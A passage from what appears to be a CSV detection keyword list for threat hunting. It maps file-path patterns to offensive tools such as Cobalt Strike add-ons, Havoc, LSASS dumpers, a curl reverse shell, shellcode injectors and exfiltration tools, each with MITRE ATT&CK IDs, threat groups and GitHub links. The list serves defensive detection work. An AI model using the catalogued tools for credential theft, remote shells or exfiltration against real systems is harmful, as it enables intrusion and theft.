Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,0,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*\crackmapexecwin*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*\cradle.ps1*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*\Crassus-main*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,0,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*\creditcards.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*\CredsPhish.log*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\CrossC2.*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,0,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*\CROSSNET\CROSSNET\*,offensive_tool_keyword,cobaltstrike,Cobaltstrike payload generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dr0op/CrossNet-Beta,1,0,N/A,10,10,352,56,2022-07-18T06:23:16Z,2021-02-08T10:52:39Z -*\cryptolok*,offensive_tool_keyword,Github Username,redteam tools github repo ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/cryptolok,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\curlshell-main*,offensive_tool_keyword,curlshell,reverse shell using curl,T1105 - T1059.004 - T1140,TA0011 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/irsl/curlshell,1,0,N/A,10,10,269,28,2023-09-29T08:31:47Z,2023-07-13T19:38:34Z -*\CurrentVersion\Uninstall\FreeFileSync_is1*,greyware_tool_keyword,freefilesync,freefilesync is a backup and file synchronization program abused by attacker for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://freefilesync.org/download.php,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*\CustomEncoding.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*\D1rkInject\*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,0,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*\darkexe.py*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*\DarkLoadLibrary.*,offensive_tool_keyword,DarkLoadLibrary,LoadLibrary for offensive 
operations,T1071.001 - T1055.002 - T1055.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bats3c/DarkLoadLibrary,1,0,N/A,10,9,874,184,2021-10-22T07:27:58Z,2021-06-17T08:33:47Z -*\dcrypt.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*\dcrypt.sys*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*\DCrypt\Bin*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*\dcrypt_setup.exe*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*\decrypted.dmp*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,0,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*\DelegationBOF.*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos 
delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,1,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*\demiguise.py*,offensive_tool_keyword,demiguise,The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.,T1564 - T1071.001 - T1071.004 - T1059 - T1070,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/nccgroup/demiguise,1,0,N/A,9,10,1321,262,2022-11-09T08:12:25Z,2017-07-26T08:56:15Z -*\demon.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\demon.x64.bin*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\demon.x64.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\demon1.dll*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\demosyscalls.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*\Dendrobate\*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*\Dendron.bin*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation 
tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*\Dendron.exe*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*\Dendron.sln*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,0,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*\DInjector.sln*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*\DInjector\*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*\dist\sigthief.exe*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,0,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*\dllexploit.cpp*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,0,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*\dllexploit.exe*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,0,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*\DllExport.bat*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*\DllVoidFunction.txt*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\dnscan.py*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*\DocsPLZ.cpp*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\DocsPLZ.exe*,offensive_tool_keyword,DocPlz,Documents Exfiltration and C2 project,T1105 - T1567 - T1071,TA0011 - TA0010 - TA0009,N/A,N/A,Data Exfiltration,https://github.com/TheD1rkMtr/DocPlz,1,0,N/A,10,1,48,6,2023-10-03T23:06:53Z,2023-10-02T20:49:22Z -*\DoHC2.cs*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*\DomainRecon\*.txt,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\donut.exe*,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*\donut\VanillaProgram.bin*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*\Doraemon*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - 
powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\duedlligence.dll*,offensive_tool_keyword,DueDLLigence,Shellcode runner framework for application whitelisting bypasses and DLL side-loading,T1055.012 - T1218.011,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/mandiant/DueDLLigence,1,0,N/A,10,5,441,90,2023-06-02T14:24:43Z,2019-10-04T18:34:27Z -*\dumper.ps1*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*\dumpert.*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,0,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*\Dumpert\*,offensive_tool_keyword,cobaltstrike,LSASS memory dumper using direct system calls and API unhooking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor,1,0,N/A,10,10,1312,237,2021-01-05T08:58:26Z,2019-06-17T18:22:01Z -*\DumpShellcode*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,0,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*\dumpXor.exe*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/seventeenman/CallBackDump,1,0,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*\dumpXor\x64\*,offensive_tool_keyword,cobaltstrike,dump lsass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/seventeenman/CallBackDump,1,0,N/A,10,10,510,74,2023-07-20T09:03:33Z,2022-09-25T08:29:14Z -*\ebowla.py*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,0,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*\EDD.exe,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z 